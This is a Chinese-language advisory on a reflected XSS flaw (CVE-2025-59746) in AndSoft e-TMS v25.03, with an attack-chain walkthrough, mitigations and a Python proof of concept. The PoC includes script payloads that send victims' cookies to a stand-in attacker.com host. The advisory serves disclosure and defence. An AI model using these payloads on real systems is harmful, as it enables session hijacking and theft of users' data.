CVE-2025-59746：AndSoft e-TMS反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59746

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS v25.03

漏洞概述

CVE-2025-59746是存在于AndSoft公司开发的e-TMS运输管理系统v25.03版本中的一个反射型跨站脚本（XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并报告，CVSS 3.1评分为6.1分，属于中危级别。e-TMS是一款企业级运输管理系统，广泛应用于物流和供应链管理领域，用于管理运输订单、车辆调度、货物跟踪等业务。

该漏洞存在于系统的'/lib/asp/alert.asp'文件中，具体涉及'm'参数。由于该参数未对用户输入进行充分的过滤和转义处理，攻击者可以通过构造包含恶意JavaScript代码的URL，诱导受害者点击，从而在受害者的浏览器上下文中执行任意JavaScript代码。由于漏洞为反射型（非存储型），恶意脚本不会持久化存储在服务器端，而是通过URL参数即时反射到响应页面中执行。

此漏洞的成功利用可能导致会话劫持、敏感信息窃取、钓鱼攻击、恶意操作执行等多种安全风险。由于e-TMS系统通常处理企业敏感的运输和物流数据，该漏洞对使用该系统的企业可能造成严重的安全威胁。INCIBE已于2025年10月2日公开披露该漏洞，建议受影响的用户尽快采取修复措施。

技术细节

该漏洞是一个典型的反射型XSS漏洞，根源在于'/lib/asp/alert.asp'文件中的'm'参数未对用户输入进行适当的HTML实体编码或过滤。

漏洞原理：
1. e-TMS系统的'/lib/asp/alert.asp'端点接收用户通过GET或POST请求传递的'm'参数。
2. 服务器端ASP脚本直接将'm'参数的值嵌入到返回的HTML响应页面中，未进行HTML编码（如<、>、"、'等字符的转义）。
3. 攻击者构造包含恶意JavaScript代码的URL，例如将<script>alert(document.cookie)</script>或其他恶意载荷作为'm'参数的值。
4. 当受害者点击该恶意URL时，服务器将包含恶意脚本的HTML内容返回给浏览器。
5. 浏览器解析HTML时执行嵌入的恶意JavaScript代码，由于脚本在e-TMS域的上下文中执行，可以访问该域的Cookie、会话令牌等敏感数据。

利用方式：
- 攻击者需要通过社会工程学手段（如钓鱼邮件、即时消息等）诱导受害者点击恶意链接。
- 由于漏洞需要用户交互（UI:R），单纯访问恶意链接不足以触发漏洞，需要用户主动点击。
- 利用复杂度低（AC:L），无需认证（PR:N），通过网络即可利用（AV:N）。
- 攻击范围发生变化（S:C），表明漏洞可能影响其他安全组件或权限范围。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标使用AndSoft e-TMS v25.03系统，通过网络侦察确定目标系统的'/lib/asp/alert.asp'端点存在。

STEP 2

步骤2：漏洞验证

攻击者构造包含测试XSS载荷的URL，如/lib/asp/alert.asp?m=<script>alert(1)</script>，验证'm'参数是否存在XSS漏洞。

STEP 3

步骤3：恶意载荷构造

攻击者构造更复杂的恶意JavaScript代码，用于窃取会话Cookie、重定向到钓鱼页面或执行其他恶意操作。

STEP 4

步骤4：社会工程攻击

攻击者通过钓鱼邮件、即时消息或其他方式将恶意URL发送给e-TMS系统的合法用户，诱导其点击。

STEP 5

步骤5：恶意代码执行

受害者点击恶意链接后，浏览器加载包含恶意脚本的页面，在e-TMS域的上下文中执行攻击者的JavaScript代码。

STEP 6

步骤6：数据窃取或恶意操作

恶意脚本窃取用户的会话Cookie、敏感数据，或以用户身份执行未授权操作，如修改运输订单、查看机密信息等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59746 - AndSoft e-TMS Reflected XSS PoC
# Vulnerable endpoint: /lib/asp/alert.asp
# Vulnerable parameter: m

# Malicious URL example:
# http://target.com/lib/asp/alert.asp?m=<script>alert('XSS')</script>

# More sophisticated payload to steal session cookies:
# http://target.com/lib/asp/alert.asp?m=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

import requests

target_url = "http://target.com/lib/asp/alert.asp"

# XSS payload
payload = "<script>alert('XSS-CVE-2025-59746')</script>"

# Construct the malicious URL
params = {"m": payload}
malicious_url = f"{target_url}?m={payload}"

print(f"Malicious URL: {malicious_url}")

# Send request to verify reflection (for testing purposes)
response = requests.get(target_url, params=params)

if payload in response.text:
    print("[+] XSS vulnerability confirmed - payload reflected in response")
else:
    print("[-] Payload not reflected or filtered")

# Cookie stealing payload (for authorized testing only)
steal_payload = "<script>new Image().src='http://attacker.com/steal?c='+document.cookie;</script>"
print(f"\nCookie stealing URL: {target_url}?m={steal_payload}")

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）在Web服务器或反向代理层面部署WAF规则，拦截包含常见XSS载荷（如<script>标签、javascript:协议、onerror/onload事件处理器等）的请求；2）通过修改ASP代码，对'm'参数进行HTML实体编码后再输出到页面；3）配置Web服务器的URL重写规则，过滤或编码可疑参数；4）为e-TMS系统部署Content Security Policy，限制内联脚本执行；5）加强对用户的钓鱼攻击防范意识培训，谨慎点击来源不明的链接；6）监控异常的网络流量和系统日志，及时发现潜在的XSS攻击尝试。